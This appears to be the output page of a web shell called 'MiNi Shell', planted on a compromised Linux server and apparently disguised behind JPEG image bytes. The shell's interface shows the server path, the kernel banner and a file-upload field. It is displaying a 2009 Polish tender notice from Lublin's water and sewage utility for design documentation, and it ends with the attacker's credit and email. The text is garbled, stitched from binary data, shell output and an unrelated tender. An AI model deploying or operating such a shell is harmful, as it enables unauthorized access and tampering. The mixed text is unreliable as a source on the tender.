JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090206/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090206/34763-N-2009.html

<p class="kh_header"><b>Lublin: Aktualizacja istniejących i wykonanie nowej dokumentacji projektowej wraz z uzgodnieniami oraz wykonanie dokumentacji przetargowej dotyczącej zamówienia na zaprojektowanie robót budowlanych wg standardów Warunków Kontraktowych FIDIC (czerwona książka) dla Kontraktu nr 9  - Przebudowa sieci wod.-kan. Śródmieście II w Lublinie oraz pełnienie nadzoru autorskiego nad realizacją robót na podstawie wykonanych dokumentacji projektowych w ramach przedsięwzięcia Rozbudowa i modernizacja systemu zaopatrzenia w wodę i odprowadzania ścieków w Lublinie, kod CPV: 71320000-7</b><br>
<b>Numer ogłoszenia: 34763 - 2009; data zamieszczenia: 06.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejskie Przedsiębiorstwo Wodociągów i Kanalizacji w Lublinie Sp. z o.o. , Al J. Piłsudskiego 15, 20-407 Lublin, woj. lubelskie, tel. 081 5324281, faks 081 5321910.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mpwik.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Aktualizacja istniejących i wykonanie nowej dokumentacji projektowej wraz z uzgodnieniami oraz wykonanie dokumentacji przetargowej dotyczącej zamówienia na zaprojektowanie robót budowlanych wg standardów Warunków Kontraktowych FIDIC (czerwona książka) dla Kontraktu nr 9  - Przebudowa sieci wod.-kan. Śródmieście II w Lublinie oraz pełnienie nadzoru autorskiego nad realizacją robót na podstawie wykonanych dokumentacji projektowych w ramach przedsięwzięcia Rozbudowa i modernizacja systemu zaopatrzenia w wodę i odprowadzania ścieków w Lublinie, kod CPV: 71320000-7.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest aktualizacja istniejących i wykonanie nowej dokumentacji projektowej wraz z uzgodnieniami oraz wykonanie dokumentacji przetargowej dotyczącej zamówienia na zaprojektowanie robót budowlanych wg standardów Warunków Kontraktowych FIDIC (czerwona książka) dla Kontraktu nr 9  - Przebudowa sieci wod.-kan. Śródmieście II w Lublinie oraz pełnienie nadzoru autorskiego nad realizacją robót na podstawie wykonanych dokumentacji projektowych w ramach przedsięwzięcia Rozbudowa i modernizacja systemu zaopatrzenia w wodę i odprowadzania ścieków w Lublinie, kod CPV: 71320000-7.


Zakres przedmiotu zamówienia obejmuje:
1.	Aktualizację istniejących oraz wykonanie nowej dokumentacji projektowej zadań inwestycyjnych zawartych w Tabeli zadań inwestycyjnych (SIWZ, pkt.I Opis przedmiotu zamówienia):
1)	Ul. Młyńska - przebudowa sieci i przyłączy konalizacji sanitarnej - wykonanie nowej dokumentacji, przebudowa sieci i przyłączy wodociągowych - aktualizacja dokumentacji.
2)	Ul. Dolna Panny Marii (od Pl. Wolności do ul. Mościckiego) -przebudowa sieci i przyłączy wodociągowych - aktualizacja dokumentacji, przebudowa sieci i przyłączy kanalizacji sanitarnej - aktualizacja dokumentacji.
3)	Ul. Dolna Panny Marii (od ul. Mościckiego do Al. Piłsudskiego)- przebudowa sieci i przyłączy wodociągowych - aktualizacja dokumentacji, przebudowa sieci i przyłączy kanalizacji sanitarnej- aktualizacja dokumentacji,
4)	 ul. Gawareckich - przebudowa sieci i przyłączy wodociągowych - aktualizacja dokumentacji, przebudowa sieci i przyłączy kanalizacji sanitarnej - aktualizacja dokumentacji,
5)	ul. Gminna - przebudowa sieci i przyłączy wodociągowych - aktualizacja dokumentacji, przebudowa sieci i przyłączy kanalizacji sanitarnej - aktualizacja dokumentacji.
6)	ul. Górna -  przebudowa sieci i przyłączy wodociągowych - aktualizacja dokumentacji, przebudowa sieci i przyłączy kanalizacji sanitarnej - aktualizacja dokumentacji.
7)	ul. Graniczna - przebudowa sieci i przyłączy wodociągowych - aktualizacja dokumentacji, przebudowa sieci i przyłączy kanalizacji sanitarnej - aktualizacja dokumentacji.
8)	ul. Konopnicka - przebudowa sieci i przyłączy wodociągowych - aktualizacja dokumentacji, przebudowa sieci i przyłączy kanalizacji sanitarnej - aktualizacja dokumentacji,
9)	ul. Krucza  - przebudowa sieci i przyłączy wodociągowych - aktualizacja dokumentacji, przebudowa sieci i przyłączy kanalizacji sanitarnej - aktualizacja dokumentacji.
10)	ul. Orla - przebudowa sieci i przyłączy wodociągowych - aktualizacja dokumentacji, przebudowa sieci i przyłączy kanalizacji sanitarnej - aktualizacja dokumentacji.
11)	ul. Ochotnicza- przebudowa sieci i przyłączy wodociągowych - aktualizacja dokumentacji, przebudowa sieci i przyłączy kanalizacji sanitarnej - aktualizacja dokumentacji.
12)	ul. Pawia- przebudowa sieci i przyłączy wodociągowych - aktualizacja dokumentacji, przebudowa sieci i przyłączy kanalizacji sanitarnej - aktualizacja dokumentacji
13)	ul. Północna- przebudowa sieci i przyłączy wodociągowych - aktualizacja dokumentacji, przebudowa sieci i przyłączy kanalizacji sanitarnej - aktualizacja dokumentacji.
14)	ul. Rowerowa- przebudowa sieci i przyłączy wodociągowych - aktualizacja dokumentacji, przebudowa sieci i przyłączy kanalizacji sanitarnej - aktualizacja dokumentacji.
15)	ul. Strażacka- przebudowa sieci i przyłączy wodociągowych - aktualizacja dokumentacji, przebudowa sieci i przyłączy kanalizacji sanitarnej - aktualizacja dokumentacji.
16)	ul. Środkowa-  przebudowa sieci i przyłączy wodociągowych - aktualizacja dokumentacji, przebudowa sieci i przyłączy kanalizacji sanitarnej - aktualizacja dokumentacji.
17)	ul. Wierzbowa- przebudowa sieci i przyłączy wodociągowych - aktualizacja dokumentacji, przebudowa sieci i przyłączy kanalizacji sanitarnej - aktualizacja dokumentacji.
18)	ul. Wschodnia- przebudowa sieci i przyłączy wodociągowych - aktualizacja dokumentacji, przebudowa sieci i przyłączy kanalizacji sanitarnej - aktualizacja dokumentacji. 
 Zaktualizowana i wykonana dokumentacja musi składać się z :
a)	projektu budowlano-wykonawczego (we wszystkich niezbędnych branżach, w tym również projektu odtworzenia nawierzchni - jeśli jest wymagany),
b)	informacji dotyczącej bezpieczeństwa i ochrony zdrowia,
c)	przedmiaru robót z podziałem na poszczególne ulice i rodzaje uzbrojenia (wodociąg, kanalizacja sanitarna),
d)	kosztorysu inwestorskiego.
2.	Opracowanie dokumentacji przetargowej według standardów WARUNKI KONTRAKTOWE DLA BUDOWY DLA ROBÓT INŻYNIERYJNO-BUDOWLANYCH PROJEKTOWANYCH PRZEZ ZAMAWIAJĄCEGO - czerwona książka FIDIC; wydanie czwarte angielsko-polskie niezmienione 2008 r. tłumaczenie pierwszego wydania z 1999r. opublikowanego przez Międzynarodową Federację Inżynierów-Konsultantów (Federation Internationale  des Ingenioeurs-Consseils - FIDIC); dokumentacja przetargowa musi  składać się z:
a)	ogłoszenia o zamówieniu,
b)	Instrukcji Dla Wykonawcy (IDW),
c)	wzoru umowy w sprawie zamówienia publicznego - Kontraktu,
d)	Specyfikacji Technicznej Wykonania i Odbioru Robót.
Do obowiązków Wykonawców należy:
1.	Uzyskanie (na własny koszt) aktualnej mapy sytuacyjno-wysokościowej do celów projektowych (dla projektów wymagających uzgodnienia ZUDP).
2.	Uzyskanie (na własny koszt) wszystkich niezbędnych decyzji, pozwoleń, opinii, uzgodnień dokumentacji projektowej - koniecznych do uzyskania pozwolenia na budowę oraz realizacji robót objętych zakresem zamawianych dokumentacji.
3.	Dokonanie (na własny koszt) wizji lokalnej terenów objętych planowanymi robotami.
4.	Wykonanie inwentaryzacji istniejącego zagospodarowania terenu i uzupełniających pomiarów sytuacyjno-wysokościowych (w zakresie niezbędnym dla prawidłowego wykonania przedmiotu zamówienia).
5.	W trakcie opracowywania dokumentacji Wykonawca zobowiązany jest do zorganizowania (przynajmniej raz w miesiącu) z Zamawiającym spotkań roboczych w celu dokonania ustaleń i uzgodnień  szczegółów przyjętych rozwiązań technicznych.
6.	Zweryfikowanie w terenie dokumentacji archiwalnych, materiałów z przeglądów znajdujących się w Archiwum Technicznym oraz Dziale Diagnostyki Sieci Wod-Kan MPWiK Sp. z o.o. w Lublinie, w związku z zakresem przebudowy przyłączy kanalizacji sanitarnej (tj. ich ilość, miejsce włączenia itp.) - dotyczy sieci nowoprojektowanych.
7.	W ramach ceny ofertowej Wykonawca zobowiązuje się do pełnienia nadzoru autorskiego nad inwestycją wykonywaną na podstawie opracowanych dokumentacji projektowych w zakresie wynikającym z art. 20 ust. 1 ustawy z dnia 7 lipca 1994 r. - Prawo budowlane. tj.:
a)	wyjaśnienia wątpliwości dotyczących projektu i zawartych w nim rozwiązań;
b)	stwierdzania w toku realizacji robót budowlanych zgodności realizacji z projektem,
c)	uzgodnienia możliwości wprowadzania rozwiązań zamiennych w stosunku do przewidzianych w projekcie, zgłoszonych przez kierownika budowy lub inspektora nadzoru inwestorskiego.

Zamawiający informuje, że: 
1.	wystąpił z wnioskiem o wydanie decyzji środowiskowej dla przebudowywanych odcinków sieci wodociągowej i kanalizacji sanitarnej objętych planowanymi robotami. Decyzja zostanie przekazana Wykonawcy w terminie 90 dni od daty podpisania umowy.
2.	posiada zgody autorów projektów na ich aktualizację..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 190.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca wniesie przed upływem terminu składania ofert wadium w wysokości 10 000,00 PLN.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Opis warunków udziału w postępowaniu (z uwzględnieniem ich znaczenia, jeżeli dotyczy) oraz opis sposobu dokonywania oceny spełniania tych warunków:
I.	Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:
O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
2)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia. 
3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
4)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia,
Na potwierdzenie warunków określonych w ppkt. 1-4 Wykonawca musi załączyć dokumenty wskazane w pkt. II.1 - II.5 
5)	zatrudniają co najmniej 10 pracowników,
Na potwierdzenie warunku określonego w ppkt. 5 Wykonawca musi załączyć dokument wskazany w pkt. II.6 
6)	dysponują osobami posiadającymi niżej określone kwalifikacje i doświadczenie niezbędne do wykonania zamówienia oraz wymagane uprawnienia (jeżeli ustawy nakładają obowiązek posiadania takich uprawnień) lub przedstawią pisemne zobowiązanie innych podmiotów do dysponowania takimi osobami:
6.1  Ekspert kluczowy nr 1: Kierownik Zespołu
-wykształcenie wyższe techniczne lub ekonomiczne lub prawnicze, 
-znajomość procedur realizacji przedsięwzięć według kontraktów FIDIC lub równoważnych,
-minimum 5 lat  (licząc do dnia wszczęcia postępowania) na stanowisku kierowniczym w nadzorowaniu kontraktów na przygotowanie dokumentacji przetargowej (kierownik zespołu, kierownik pracowni, kierownik działu, menedżer, itp.),
-doświadczenie w opracowywaniu  dokumentacji przetargowych, w tym co najmniej jednej dokumentacji przetargowej związanej z wykonaniem sieci kanalizacyjnej i/lub wodociągowej o wartości robót nie mniejszej niż 5 000 000 PLN brutto.

6.2 Ekspert kluczowy nr 2: Specjalista ds. sieci wod.-kan.:
-wykształcenie wyższe techniczne,
-znajomość procedur realizacji przedsięwzięć według kontraktów FIDIC lub równoważnych,
-minimum 3 letnie doświadczenie zawodowe (licząc do dnia wszczęcia postępowania), w tym udział jako projektant w przygotowaniu dokumentacji projektowej dla co najmniej 3 km sieci wod-kan,
-posiada uprawnienia budowlane do projektowania w specjalności instalacyjnej
w zakresie sieci wodociągowych i kanalizacyjnych,
-przynależność do właściwej izby samorządu zawodowego.

6.3 Ekspert kluczowy nr 3: Ekspert ds. zamówień publicznych:
-wykształcenie wyższe,
-znajomość procedur realizacji przedsięwzięć według kontraktów FIDIC lub równoważnych,
-minimum 5 letnie doświadczenie zawodowe (licząc do dnia wszczęcia postępowania) w zakresie zamówień publicznych,
-udział w przygotowaniu zakresu formalno-prawnego oraz merytorycznego obejmującego zagadnienia dotyczące I (IDW) i II (wzór umowy) części SIWZ, minimum 1 dokumentacji przetargowej (na podstawie, której wybrany został Wykonawca robót o wartości realizacji robót co najmniej 5 000 000 PLN brutto).

UWAGA: Wymieniony powyżej skład zespołu ekspertów należy traktować jako minimalne wymaganie Zamawiającego i nie wyczerpuje całości personelu niezbędnego do rzetelnego wypełnienia zobowiązań Wykonawcy. Zamawiający informuje, że jedna osoba nie może pełnić więcej niż jednej funkcji w zespole Ekspertów kluczowych.  Pełnienie przez jedną osobę kilku funkcji nie gwarantuje terminowego i należytego wykonania  zamówienia
Na potwierdzenie spełnienia warunku określonego w ppkt. 6 Wykonawca musi załączyć dokumenty wskazane w pkt.II.7 i  II.8 
7)	wykonali  z należytą starannością w ciągu ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, następujące opracowania:
7.1	 co najmniej 4 dokumentacje projektowe sieci wod. - kan. o wartości dokumentacji każda co najmniej 50 000,00 PLN brutto,
7.2	co najmniej 1 Informację Dla Wykonawców (IDW) według standardów WARUNKI KONTRAKTOWE DLA BUDOWY DLA ROBÓT INŻYNIERYJNO-BUDOWLANYCH PROJEKTOWANYCH PRZEZ ZAMAWIAJĄCEGO- czerwona książka FIDIC dotyczącą zamówienia na roboty budowlane związane z wykonaniem sieci kanalizacyjnej o średnicy nominalnej min. O 200 mm i długości min. 3 km oraz sieci wodociągowej o średnicy nominalnej min. O 100 mm i długości min. 3 km. 
Wykonawca musi łącznie spełniać warunki wyszczególnione w ppkt. 7.1-7.2, przy czym Zamawiający dopuszcza wykonanie ww opracowań dot. różnych zadań inwestycyjnych.
Na potwierdzenie spełnienia warunków określonych w ppkt. 7 Wykonawca musi załączyć dokumenty wskazane w pkt. II.9-II.10 
8)	posiadają środki finansowe lub zdolność kredytową w wysokości nie mniej niż 50 000,00 PLN. 
Na potwierdzenie spełnienia warunku określonego w ppkt. 8 Wykonawca musi załączyć dokumenty wskazane w pkt. II.11 .

Ocena spełniania przez Wykonawców warunków udziału w postępowaniu będzie dokonana na podstawie dokumentów załączonych przez nich do ofert wg  formuły  spełnia - nie spełnia.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> II.	Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu
1.	Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu - wg załącznika nr 3 do SIWZ.
W przypadku wspólnego ubiegania się o udzielenie zamówienia należy złożyć jedno - wspólne oświadczenie o spełnianiu warunków udziału w postępowaniu złożone przez Pełnomocnika Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Wymagana forma dokumentu: oryginał.
2.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3.	Aktualne informacje z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 4 - 8 ustawy Prawo zamówień publicznych, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
4.	Aktualne informacje z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 9 ustawy Prawo zamówień publicznych, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania  ofert.
5.	Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego, potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
W przypadku wspólnego ubiegania się o udzielenie zamówienia wymóg dostarczenia  dokumentów określonych w pkt II.2, II. 3, II. 4, II. 5 dotyczy każdego Wykonawcy  i  przedkłada je każdy z nich. Wymagana forma dokumentu: oryginał lub kopia poświadczona za zgodność z oryginałem przez Pełnomocnika Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
6.	Informacja na temat aktualnej  liczby zatrudnionych pracowników.
7.	Wykaz osób którymi dysponuje lub będzie dysponował wykonawca, i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności (wg zał. Nr 4 do SIWZ).
8.	Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w ppkt. 7, wykonawca wskazał osoby, którymi będzie dysponował.
9.	Wykaz usług wykonanych w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców (wg zał. Nr 5 do SIWZ).
10.	Dokumenty potwierdzające, że usługi zestawione w wykazie, o którym mowa w ppkt. 9 zostały wykonane należycie.
W przypadku wspólnego ubiegania się o udzielenie zamówienia dysponowanie osobami, niezbędna wiedza,  doświadczenie oceniane będą łącznie dla wszystkich Wykonawców  na podstawie informacji zawartych w dokumentach określonych w pkt II. 6,  II. 7, II.  8, II.  9, II. 10. Wymagana forma dokumentów: oryginał lub kopia poświadczona za zgodność z oryginałem przez Pełnomocnika Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
11.	Informacja z banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w której Wykonawca posiada rachunek, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy na kwotę nie mniejszą niż 50 000,00 PLN wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
W przypadku wspólnego ubiegania się o udzielenie zamówienia oceniana będzie łączna sytuacja ekonomiczna i finansowa Wykonawców na podstawie informacji zawartych w dokumentach określonych w pkt. II. 11. Wymagana forma dokumentu: oryginał lub kopia poświadczona za zgodność z oryginałem przez Pełnomocnika Wykonawców wspólnie ubiegających się o udzielenie zamówienia 
UWAGA:
W przypadku Wykonawców mających swoją siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w:
A1)	Podpunktach II. 2, II. 4 i II. 5 - należy złożyć dokument lub dokumenty, wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości;
b)	nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
c)	nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.
A2)	Podpunkcie II. 3 - należy złożyć zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4 - 8 ustawy.
Dokumenty, o których mowa w podpunkcie II. A1) lit. a) i b) oraz w podpunkcie II. A2), powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokument, o którym mowa w podpunkcie II. A1) lit. c), powinien  być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów o których mowa w podpunktach II. A1) I II. A2), zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, przy czym termin wystawienia dokumentu musi być odpowiedni zgodny z terminami określonymi powyżej..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.mpwik.lublin.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację istotnych warunków zamówienia można uzyskać pod adresem MPWiK Sp. z o.o. w Lublinie, al. J. Piłsudskiego 15 (budynek B, p. 109).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.03.2009 godzina 13:00, miejsce: Miejsce: Siedziba zamawiającego - Lublin, al. J. Piłsudskiego 15, Sekretariat, I p..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com